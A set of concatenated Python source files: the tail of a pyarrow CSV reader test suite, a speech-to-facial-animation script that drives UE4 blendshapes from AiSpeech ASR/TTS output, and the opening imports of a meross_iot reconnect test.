('d', pa.int64())])
assert table.schema == schema
assert table.to_pydict() == {
'a': [None, None],
'b': ["Xxx", "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=['Xxx', 'Zzz'],
strings_can_be_null=True)
table = self.read_bytes(rows, convert_options=opts)
assert table.to_pydict() == {
'a': [None, None],
'b': [None, "#N/A"],
'c': ["1", ""],
'd': [2, None],
}
opts = ConvertOptions(null_values=[])
rows = b"a,b\n#N/A,\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["#N/A"],
'b': [""],
}
def test_custom_bools(self):
# Infer booleans with custom values
opts = ConvertOptions(true_values=['T', 'yes'],
false_values=['F', 'no'])
rows = (b"a,b,c\n"
b"True,T,t\n"
b"False,F,f\n"
b"True,yes,yes\n"
b"False,no,no\n"
b"N/A,N/A,N/A\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.string()),
('b', pa.bool_()),
('c', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'a': ["True", "False", "True", "False", "N/A"],
'b': [True, False, True, False, None],
'c': ["t", "f", "yes", "no", "N/A"],
}
def test_column_types(self):
# Ask for specific column types in ConvertOptions
opts = ConvertOptions(column_types={'b': 'float32',
'c': 'string',
'd': 'boolean',
'e': pa.decimal128(11, 2),
'zz': 'null'})
rows = b"a,b,c,d,e\n1,2,3,true,1.0\n4,-5,6,false,0\n"
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema([('a', pa.int64()),
('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2))])
expected = {
'a': [1, 4],
'b': [2.0, -5.0],
'c': ["3", "6"],
'd': [True, False],
'e': [Decimal("1.00"), Decimal("0.00")]
}
assert table.schema == schema
assert table.to_pydict() == expected
# Pass column_types as schema
opts = ConvertOptions(
column_types=pa.schema([('b', pa.float32()),
('c', pa.string()),
('d', pa.bool_()),
('e', pa.decimal128(11, 2)),
('zz', pa.bool_())]))
table = self.read_bytes(rows, convert_options=opts)
assert table.schema == schema
assert table.to_pydict() == expected
# One of the columns in column_types fails converting
rows = b"a,b,c,d,e\n1,XXX,3,true,5\n4,-5,6,false,7\n"
with pytest.raises(pa.ArrowInvalid) as exc:
self.read_bytes(rows, convert_options=opts)
err = str(exc.value)
assert "In CSV column #1: " in err
assert "CSV conversion error to float: invalid value 'XXX'" in err
def test_column_types_dict(self):
# Ask for dict-encoded column types in ConvertOptions
column_types = [
('a', pa.dictionary(pa.int32(), pa.utf8())),
('b', pa.dictionary(pa.int32(), pa.int64())),
('c', pa.dictionary(pa.int32(), pa.decimal128(11, 2))),
('d', pa.dictionary(pa.int32(), pa.large_utf8()))]
opts = ConvertOptions(column_types=dict(column_types))
rows = (b"a,b,c,d\n"
b"abc,123456,1.0,zz\n"
b"defg,123456,0.5,xx\n"
b"abc,N/A,1.0,xx\n")
table = self.read_bytes(rows, convert_options=opts)
schema = pa.schema(column_types)
expected = {
'a': ["abc", "defg", "abc"],
'b': [123456, 123456, None],
'c': [Decimal("1.00"), Decimal("0.50"), Decimal("1.00")],
'd': ["zz", "xx", "xx"],
}
assert table.schema == schema
assert table.to_pydict() == expected
# Unsupported index type
column_types[0] = ('a', pa.dictionary(pa.int8(), pa.utf8()))
opts = ConvertOptions(column_types=dict(column_types))
with pytest.raises(NotImplementedError):
table = self.read_bytes(rows, convert_options=opts)
def test_column_types_with_column_names(self):
# When both `column_names` and `column_types` are given, names
# in `column_types` should refer to names in `column_names`
rows = b"a,b\nc,d\ne,f\n"
read_options = ReadOptions(column_names=['x', 'y'])
convert_options = ConvertOptions(column_types={'x': pa.binary()})
table = self.read_bytes(rows, read_options=read_options,
convert_options=convert_options)
schema = pa.schema([('x', pa.binary()),
('y', pa.string())])
assert table.schema == schema
assert table.to_pydict() == {
'x': [b'a', b'c', b'e'],
'y': ['b', 'd', 'f'],
}
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 4],
'b': [2, 5],
'c': [3, 6],
}
def test_trivial(self):
# A bit pointless, but at least it shouldn't crash
rows = b",\n\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {'': []}
def test_empty_lines(self):
rows = b"a,b\n\r1,2\r\n\r\n3,4\r\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a': [1, 3],
'b': [2, 4],
}
parse_options = ParseOptions(ignore_empty_lines=False)
table = self.read_bytes(rows, parse_options=parse_options)
assert table.to_pydict() == {
'a': [None, 1, None, 3],
'b': [None, 2, None, 4],
}
read_options = ReadOptions(skip_rows=2)
table = self.read_bytes(rows, parse_options=parse_options,
read_options=read_options)
assert table.to_pydict() == {
'1': [None, 3],
'2': [None, 4],
}
def test_invalid_csv(self):
# Various CSV errors
rows = b"a,b,c\n1,2\n4,5,6\n"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 2"):
self.read_bytes(rows)
rows = b"a,b,c\n1,2,3\n4"
with pytest.raises(pa.ArrowInvalid, match="Expected 3 columns, got 1"):
self.read_bytes(rows)
for rows in [b"", b"\n", b"\r\n", b"\r", b"\n\n"]:
with pytest.raises(pa.ArrowInvalid, match="Empty CSV file"):
self.read_bytes(rows)
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
table = self.read_bytes(rows)
assert table.to_pydict() == {
'a;b': ['de'],
'c': ['fg;eh'],
}
opts = ParseOptions(delimiter=';')
table = self.read_bytes(rows, parse_options=opts)
assert table.to_pydict() == {
'a': ['de,fg'],
'b,c': ['eh'],
}
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
table = self.read_bytes(csv)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [11, 12, 13, 17, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
read_options = ReadOptions(block_size=block_size)
table = self.read_bytes(csv, read_options=read_options)
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
def test_stress_convert_options_blowup(self):
# ARROW-6481: A convert_options with a very large number of columns
# should not blow memory and CPU time.
try:
clock = time.thread_time
except AttributeError:
clock = time.time
num_columns = 10000
col_names = ["K{}".format(i) for i in range(num_columns)]
csv = make_empty_csv(col_names)
t1 = clock()
convert_options = ConvertOptions(
column_types={k: pa.string() for k in col_names[::2]})
table = self.read_bytes(csv, convert_options=convert_options)
dt = clock() - t1
# Check that processing time didn't blow up.
# This is a conservative check (it takes less than 300 ms
# in debug mode on my local machine).
assert dt <= 10.0
# Check result
assert table.num_columns == num_columns
assert table.num_rows == 0
assert table.column_names == col_names
def test_cancellation(self):
if (threading.current_thread().ident !=
threading.main_thread().ident):
pytest.skip("test only works from main Python thread")
if sys.version_info >= (3, 8):
raise_signal = signal.raise_signal
elif os.name == 'nt':
# On Windows, os.kill() doesn't actually send a signal,
# it just terminates the process with the given exit code.
pytest.skip("test requires Python 3.8+ on Windows")
else:
# On Unix, emulate raise_signal() with os.kill().
def raise_signal(signum):
os.kill(os.getpid(), signum)
# Make the interruptible workload large enough to not finish
# before the interrupt comes, even in release mode on fast machines
large_csv = b"a,b,c\n" + b"1,2,3\n" * 200_000_000
def signal_from_thread():
time.sleep(0.2)
raise_signal(signal.SIGINT)
t1 = time.time()
try:
try:
t = threading.Thread(target=signal_from_thread)
with pytest.raises(KeyboardInterrupt) as exc_info:
t.start()
self.read_bytes(large_csv)
finally:
t.join()
except KeyboardInterrupt:
# In case KeyboardInterrupt didn't interrupt `self.read_bytes`
# above, at least prevent it from stopping the test suite
self.fail("KeyboardInterrupt didn't interrupt CSV reading")
dt = time.time() - t1
assert dt <= 1.0
e = exc_info.value.__context__
assert isinstance(e, pa.ArrowCancelled)
assert e.signum == signal.SIGINT
def test_cancellation_disabled(self):
# ARROW-12622: reader would segfault when the cancelling signal
# handler was not enabled (e.g. if disabled, or if not on the
# main thread)
t = threading.Thread(target=lambda: self.read_bytes(b"f64\n0.1"))
t.start()
t.join()
class TestSerialCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class TestParallelCSVRead(BaseTestCSVRead, unittest.TestCase):
def read_csv(self, *args, validate_full=True, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = True
table = read_csv(*args, **kwargs)
table.validate(full=validate_full)
return table
class BaseTestStreamingCSVRead:
def open_bytes(self, b, **kwargs):
return self.open_csv(pa.py_buffer(b), **kwargs)
def check_reader(self, reader, expected_schema, expected_data):
assert reader.schema == expected_schema
batches = list(reader)
assert len(batches) == len(expected_data)
for batch, expected_batch in zip(batches, expected_data):
batch.validate(full=True)
assert batch.schema == expected_schema
assert batch.to_pydict() == expected_batch
def test_file_object(self):
data = b"a,b\n1,2\n3,4\n"
expected_data = {'a': [1, 3], 'b': [2, 4]}
bio = io.BytesIO(data)
reader = self.open_csv(bio)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
self.check_reader(reader, expected_schema, [expected_data])
def test_header(self):
rows = b"abc,def,gh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('abc', pa.null()),
('def', pa.null()),
('gh', pa.null())])
self.check_reader(reader, expected_schema, [])
def test_inference(self):
# Inference is done on first block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
read_options = ReadOptions()
read_options.block_size = len(rows)
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc', 'gh'],
'b': [b'456', b'de\xff', b'ij']}])
read_options.block_size = len(rows) - 1
reader = self.open_bytes(rows, read_options=read_options)
self.check_reader(reader, expected_schema,
[{'a': ['123', 'abc'],
'b': [b'456', b'de\xff']},
{'a': ['gh'],
'b': [b'ij']}])
def test_inference_failure(self):
# Inference on first block, then conversion failure on second block
rows = b"a,b\n123,456\nabc,de\xff\ngh,ij\n"
read_options = ReadOptions()
read_options.block_size = len(rows) - 7
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {
'a': [123], 'b': [456]
}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
# Inference on first block, then conversion failure on second block,
# then success on third block
rows = b"a,b\n1,2\nabc,def\n45,67\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64())])
assert reader.schema == expected_schema
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
# Second block
with pytest.raises(ValueError,
match="CSV conversion error to int64"):
reader.read_next_batch()
# Third block
assert reader.read_next_batch().to_pydict() == {'a': [45], 'b': [67]}
# EOF
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_invalid_csv(self):
# CSV errors on first block
rows = b"a,b\n1,2,3\n4,5\n6,7\n"
read_options = ReadOptions()
read_options.block_size = 10
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader = self.open_bytes(rows, read_options=read_options)
# CSV errors on second block
rows = b"a,b\n1,2\n3,4,5\n6,7\n"
read_options.block_size = 8
reader = self.open_bytes(rows, read_options=read_options)
assert reader.read_next_batch().to_pydict() == {'a': [1], 'b': [2]}
with pytest.raises(pa.ArrowInvalid,
match="Expected 2 columns, got 3"):
reader.read_next_batch()
# Cannot continue after a parse error
with pytest.raises(StopIteration):
reader.read_next_batch()
def test_options_delimiter(self):
rows = b"a;b,c\nde,fg;eh\n"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a;b', pa.string()),
('c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a;b': ['de'],
'c': ['fg;eh']}])
opts = ParseOptions(delimiter=';')
reader = self.open_bytes(rows, parse_options=opts)
expected_schema = pa.schema([('a', pa.string()),
('b,c', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ['de,fg'],
'b,c': ['eh']}])
def test_no_ending_newline(self):
# No \n after last line
rows = b"a,b,c\n1,2,3\n4,5,6"
reader = self.open_bytes(rows)
expected_schema = pa.schema([('a', pa.int64()),
('b', pa.int64()),
('c', pa.int64())])
self.check_reader(reader, expected_schema,
[{'a': [1, 4],
'b': [2, 5],
'c': [3, 6]}])
def test_empty_file(self):
with pytest.raises(ValueError, match="Empty CSV file"):
self.open_bytes(b"")
def test_column_options(self):
# With column_names
rows = b"1,2,3\n4,5,6"
read_options = ReadOptions()
read_options.column_names = ['d', 'e', 'f']
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('d', pa.int64()),
('e', pa.int64()),
('f', pa.int64())])
self.check_reader(reader, expected_schema,
[{'d': [1, 4],
'e': [2, 5],
'f': [3, 6]}])
# With include_columns
convert_options = ConvertOptions()
convert_options.include_columns = ['f', 'e']
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.int64())])
self.check_reader(reader, expected_schema,
[{'e': [2, 5],
'f': [3, 6]}])
# With column_types
convert_options.column_types = {'e': pa.string()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'e': ["2", "5"],
'f': [3, 6]}])
# Missing columns in include_columns
convert_options.include_columns = ['g', 'f', 'e']
with pytest.raises(
KeyError,
match="Column 'g' in include_columns does not exist"):
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
convert_options.include_missing_columns = True
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.null()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
convert_options.column_types = {'e': pa.string(), 'g': pa.float64()}
reader = self.open_bytes(rows, read_options=read_options,
convert_options=convert_options)
expected_schema = pa.schema([('g', pa.float64()),
('f', pa.int64()),
('e', pa.string())])
self.check_reader(reader, expected_schema,
[{'g': [None, None],
'e': ["2", "5"],
'f': [3, 6]}])
def test_encoding(self):
# latin-1 (invalid utf-8)
rows = b"a,b\nun,\xe9l\xe9phant"
read_options = ReadOptions()
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.binary())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': [b"\xe9l\xe9phant"]}])
read_options.encoding = 'latin1'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
# utf-16
rows = (b'\xff\xfea\x00,\x00b\x00\n\x00u\x00n\x00,'
b'\x00\xe9\x00l\x00\xe9\x00p\x00h\x00a\x00n\x00t\x00')
read_options.encoding = 'utf16'
reader = self.open_bytes(rows, read_options=read_options)
expected_schema = pa.schema([('a', pa.string()),
('b', pa.string())])
self.check_reader(reader, expected_schema,
[{'a': ["un"],
'b': ["éléphant"]}])
def test_small_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=10)
reader = self.open_bytes(csv)
table = reader.read_all()
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
def test_stress_block_sizes(self):
# Test a number of small block sizes to stress block stitching
csv_base, expected = make_random_csv(num_cols=2, num_rows=500)
block_sizes = [19, 21, 23, 26, 37, 111]
csvs = [csv_base, csv_base.rstrip(b'\r\n')]
for csv in csvs:
for block_size in block_sizes:
# Need at least two lines for type inference
assert csv[:block_size].count(b'\n') >= 2
read_options = ReadOptions(block_size=block_size)
reader = self.open_bytes(csv, read_options=read_options)
table = reader.read_all()
assert table.schema == expected.schema
if not table.equals(expected):
# Better error output
assert table.to_pydict() == expected.to_pydict()
class TestSerialStreamingCSVRead(BaseTestStreamingCSVRead, unittest.TestCase):
def open_csv(self, *args, **kwargs):
read_options = kwargs.setdefault('read_options', ReadOptions())
read_options.use_threads = False
return open_csv(*args, **kwargs)
def test_batch_lifetime(self):
gc.collect()
old_allocated = pa.total_allocated_bytes()
# Memory occupation should not grow with CSV file size
def check_one_batch(reader, expected):
batch = reader.read_next_batch()
assert batch.to_pydict() == expected
rows = b"10,11\n12,13\n14,15\n16,17\n"
read_options = ReadOptions()
read_options.column_names = ['a', 'b']
read_options.block_size = 6
reader = self.open_bytes(rows, read_options=read_options)
check_one_batch(reader, {'a': [10], 'b': [11]})
allocated_after_first_batch = pa.total_allocated_bytes()
check_one_batch(reader, {'a': [12], 'b': [13]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [14], 'b': [15]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
check_one_batch(reader, {'a': [16], 'b': [17]})
assert pa.total_allocated_bytes() == allocated_after_first_batch
with pytest.raises(StopIteration):
reader.read_next_batch()
assert pa.total_allocated_bytes() == old_allocated
reader = None
assert pa.total_allocated_bytes() == old_allocated
class BaseTestCompressedCSVRead:
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix='arrow-csv-test-')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def read_csv(self, csv_path):
try:
return read_csv(csv_path)
except pa.ArrowNotImplementedError as e:
pytest.skip(str(e))
def test_random_csv(self):
csv, expected = make_random_csv(num_cols=2, num_rows=100)
csv_path = os.path.join(self.tmpdir, self.csv_filename)
self.write_file(csv_path, csv)
table = self.read_csv(csv_path)
table.validate(full=True)
assert table.schema == expected.schema
assert table.equals(expected)
assert table.to_pydict() == expected.to_pydict()
class TestGZipCSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.gz"
def write_file(self, path, contents):
with gzip.open(path, 'wb', 3) as f:
f.write(contents)
def test_concatenated(self):
# ARROW-5974
csv_path = os.path.join(self.tmpdir, self.csv_filename)
with gzip.open(csv_path, 'wb', 3) as f:
f.write(b"ab,cd\nef,gh\n")
with gzip.open(csv_path, 'ab', 3) as f:
f.write(b"ij,kl\nmn,op\n")
table = self.read_csv(csv_path)
assert table.to_pydict() == {
'ab': ['ef', 'ij', 'mn'],
'cd': ['gh', 'kl', 'op'],
}
class TestBZ2CSVRead(BaseTestCompressedCSVRead, unittest.TestCase):
csv_filename = "compressed.csv.bz2"
def write_file(self, path, contents):
with bz2.BZ2File(path, 'w') as f:
f.write(contents)
def test_read_csv_does_not_close_passed_file_handles():
# ARROW-4823
buf = io.BytesIO(b"a,b,c\n1,2,3\n4,5,6")
read_csv(buf)
assert not buf.closed
def test_write_read_round_trip():
t = pa.Table.from_arrays([[1, 2, 3], ["a", "b", "c"]], ["c1", "c2"])
record_batch = t.to_batches(max_chunksize=4)[0]
for data in [t, record_batch]:
# Test with header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=True))
buf.seek(0)
assert t == read_csv(buf)
# Test without header
buf = io.BytesIO()
write_csv(data, buf, WriteOptions(include_header=False))
buf.seek(0)
read_options = ReadOptions(column_names=t.column_names)
assert t == read_csv(buf, read_options=read_options)
|
zsmeif.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
AiSpeech/main.py
~~~~~
:copyright:facegood © 2019 by the tang.
"""
import os
import sys
import time
from os.path import abspath, dirname, join
import codecs
import json
# *******************************************
# *******************************************
package_path = "./"
# speakers = ["zsmeif", "lchuam"]
# *******************************************
path_aispeech_config = join(package_path,"zsmeif_aispeech_config.json")
try:
with codecs.open(path_aispeech_config, 'r', 'utf-8-sig') as fconfig:
AiSpeechConfig = json.load(fconfig)
except Exception as err:
print("Read file failed,",path_aispeech_config,".Error is :",err)
os.system("pause")
exit(1)
# *******************************************
productId = AiSpeechConfig['api_key']['productId']
publicKey = AiSpeechConfig['api_key']['publicKey']
secretkey = AiSpeechConfig['api_key']['secretKey']
productIdChat = AiSpeechConfig['api_key']['productIdChat']
SPEAKER = AiSpeechConfig['api_key']['speaker']
BA_URL = AiSpeechConfig['api_ba']['url']
WSURL = AiSpeechConfig['api_websocket']['url']+productId + "&token="
request_body_json=json.dumps(AiSpeechConfig['api_websocket']['request_body_first'])
info_print = AiSpeechConfig['config']['print']
ID_SESSION = AiSpeechConfig['config']['session']
FPS = AiSpeechConfig['config']['fps']
SPEED_PLAY = float(1.0 / FPS)
# *******************************************
# *******************************************
import lib.socket.ue4_socket as ue4
ADDR_BIND = (AiSpeechConfig['config']['server']['ip'],AiSpeechConfig['config']['server']['port'])
ADDR_SEND = (AiSpeechConfig['config']['client']['ip'],AiSpeechConfig['config']['client']['port'])
ue4.BUFF_SIZE = AiSpeechConfig['config']['ue4']['recv_size']
ue4.RECORDING = False
ue4.RECORDING_BEGIN = AiSpeechConfig['config']['ue4']['begin'].encode('utf-8')
ue4.RECORDING_END = AiSpeechConfig['config']['ue4']['end'].encode('utf-8')
# *******************************************
# *******************************************
# blendshape (bs) indices whose weights stay constant (not predicted by the model)
const_bs_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 16, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 37, 39, 46, 47, 48, 49, 50, 55, 56, 61, 62, 65, 70, 71, 72, 73, 83, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115]
# blendshape indices that are predicted by the model
var_bs_index = [10, 13, 14, 15, 18, 33, 38, 40, 41, 42, 43, 44, 45, 51, 52, 53, 54, 57, 58, 59, 60, 63, 64, 66, 67, 68, 69, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84]
# default values for the constant blendshape weights
const_bs_value = [0.,0.,-0.,0.,-0.,0.,-0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,-0.,-0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.,-0.,0.]
# reordering of blendshape indices to match the UE4 input order
bs_name_index = [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 94, 93, 95, 96, 97, 98, 99, 100, 101, 102, 103, 105, 104, 106, 107, 108, 109, 110, 111, 112, 113, 114, 1, 115]
BS_CONUNT = 116
pbfile_path = join(package_path, 'zsmeif.pb')
CPU_Thread = AiSpeechConfig['config']['tensorflow']['cpu']
CPU_Frames = AiSpeechConfig['config']['tensorflow']['frames']
# *******************************************
# *******************************************
import numpy as np
from lib.audio.api_audio import AudioRecognition, AudioPlay
from lib.tensorflow.input_wavdata_output_lpc import c_lpc, get_audio_frames
from lib.tensorflow.input_lpc_output_weight import WeightsAnimation
pb_weights_animation = WeightsAnimation(pbfile_path)
get_weight = pb_weights_animation.get_weight
# *******************************************
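# worker: pulls batches of audio frames from q_input, runs LPC feature
# extraction and the TensorFlow model on each frame, scatters the predicted
# values into the full 116-element blendshape vector (reordered for UE4), and
# pushes the result to q_output.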
def worker(q_input, q_output, i):
print("the cpus number is:", i)
while True:
input_data = q_input.get()
for output_wav in input_data:
output_lpc = c_lpc(output_wav)
output_data = get_weight(output_lpc)
# scatter the predicted weights into the full blendshape vector
weights = np.zeros((output_data.shape[0],BS_CONUNT))
# print(weights.shape)
weights[:,var_bs_index] = output_data
weights[:,const_bs_index] = const_bs_value
weights1 = np.zeros((output_data.shape[0],BS_CONUNT))
for i in range(len(bs_name_index)):
weights1[:,i] = weights[:,bs_name_index[i]]
q_output.put(weights1)
# *******************************************
import threading
from queue import Queue
class SoundAnimation:
def __init__(self,cpus = 1,input_nums = 30):
self.cpus = cpus
self.input_nums = input_nums
self.init_multiprocessing()
self.flag_start = False
def __del__(self):
if self.flag_start:
self.stop_multiprocessing()
def init_multiprocessing(self):
self.q_input = [Queue() for i in range(0, self.cpus)]
self.q_output = [Queue() for i in range(0, self.cpus)]
self.process = []
for i in range(0, self.cpus):
self.process.append(
threading.Thread(target=worker, args=(self.q_input[i], self.q_output[i], i)))
def start_multiprocessing(self):
self.flag_start = True
for i in range(0, self.cpus):
self.process[i].daemon = True
self.process[i].start()
def stop_multiprocessing(self):
# The workers are daemon threads (threading.Thread has no terminate()),
# so they simply exit with the interpreter; nothing to clean up here.
pass
def input_frames_data(self, input_date):
input_data_nums = [input_date[i:i + self.input_nums] for i in range(0, len(input_date), self.input_nums)]
self.flag_nums = len(input_data_nums)
for i in range(0, self.cpus):
self.q_input[i].put(input_data_nums[i::self.cpus])
def yield_output_data(self):
num = 0
flag_end = True
while flag_end:
for i in range(0, self.cpus):
if num == self.flag_nums:
flag_end = False
break
data_output = self.q_output[i].get()
for data in data_output:
yield data
num += 1
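# Illustrative flow (the real wiring is in the __main__ block below); the
# send_to_ue4 callable here is hypothetical:
#   sa = SoundAnimation(cpus=1, input_nums=30)
#   sa.start_multiprocessing()
#   sa.input_frames_data(get_audio_frames(voice))  # voice: int16 numpy array
#   for frame_weights in sa.yield_output_data():
#       send_to_ue4(frame_weights)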
# *******************************************
# *******************************************
from lib.audio.api_audio import AudioRecognition
from lib.aispeech.api_aispeech import AiSpeech
from lib.aispeech.api_websocket import AiSpeechWebSocket
def main(fun_socket_send):
#**********************************************#
# token expiry time (milliseconds since the epoch)
expireTime = aispeech.update_token()
if not aispeech.token:
print("Eerrr: get token, please wait a moment")
exit(1)
url = WSURL + aispeech.token
asr_websocket = AiSpeechWebSocket(url,request_body_json)
expireTimeSecs = 300
while True:
if expireTime < int((time.time()+expireTimeSecs)*1000):
print("getToken")
expireTime = aispeech.update_token()
if not aispeech.token:
print("Eerrr: get token, please wait a moment")
exit(1)
asr_websocket.url = WSURL + aispeech.token
time.sleep(0.01)
while ue4.RECORDING:
# 1. speech recognition (ASR) over the websocket
num = 0
flag = asr_websocket.ws_asr_create_connection(timeout=20)
if not flag:
print("ERROR: Could not create connection:",url)
exit()
asr_websocket.send_ws_asr_data(send_status=1)
# Nero test
# buf = []
while ue4.RECORDING:
if info_print:
print("Recording:",num)
num += 1
buf=record.recording()
asr_websocket.send_ws_asr_data(data = buf,send_status=2)
asr_websocket.send_ws_asr_data(send_status=3)
if info_print:
print("wait get asr:")
get_time = time.time()
text = asr_websocket.get_text_from_ws_asr()
if info_print:
print("asr time:",time.time()-get_time)
r_asr_websocket = json.loads(text)
if r_asr_websocket['status'] == 200:
text_asr = r_asr_websocket['result']['asr']['text']
if text_asr:
if info_print:
print("asr:",text_asr)
print("wait get tts:")
dm_tts_time = time.time()
dm_tts = aispeech.dm_tts(url=BA_URL,text=text_asr,speaker= SPEAKER)
if info_print:
print("tts time is:",time.time()-dm_tts_time)
if dm_tts.status_code == 200:
b_wav_data = dm_tts.content
if b_wav_data:
# 4. audio playback and facial animation
def play_audio_animation():
voice = np.frombuffer(b_wav_data[44:], dtype=np.int16)
input_data = get_audio_frames(voice)
try:
sound_animation.input_frames_data(input_data)
is_first = True
f_num = 0
f_btime = time.time()
for weight in sound_animation.yield_output_data():
f_num += 1
# f_time = time.time()
if is_first:
player.play_audio_data_thread(b_wav_data[44:])
f_btime = time.time()
is_first = False
fun_socket_send(weight)
time.sleep(max(0.0, SPEED_PLAY*f_num-(time.time()-f_btime)))
# print(f_num,":frame:",time.time()-f_time)
except Exception as err:
print("Sound animation type error: ", err)
# break
voice_thread = threading.Thread(target=play_audio_animation)
voice_thread.daemon = True
voice_thread.start()
voice_thread.join()
# end b_wav_data
# end text_asr
else:
print("ERROR:",r_asr_websocket)
# end asr
if info_print:
print("wait recording")
# end while RECORDING:
# end while True:
# *******************************************
if __name__ == "__main__":
udp_recv_handler = ue4.UdpRecvHandler(ADDR_BIND)
udp_send_handler = ue4.UdpSendHandler(ADDR_SEND)
#***************tensorflow*******************************#
player = AudioPlay()
sound_animation = SoundAnimation(CPU_Thread, CPU_Frames)
sound_animation.start_multiprocessing()
#****************aispeech******************************#
record = AudioRecognition()
aispeech = AiSpeech(productId,publicKey,secretkey,productIdChat=productIdChat)
#****************main******************************#
while True:
print("run main")
try:
main(udp_send_handler.send_handler)
except Exception as error:
print("Error Main loop:",error)
time.sleep(60)
#****************main******************************#
print("# *******************************************")
|
test_autoreconnect.py
|
import os
import time
import unittest
from threading import Event, Thread
import socks
import sys
from meross_iot.cloud.client_status import ClientStatus
from meross_iot.cloud.devices.power_plugs import GenericPlug
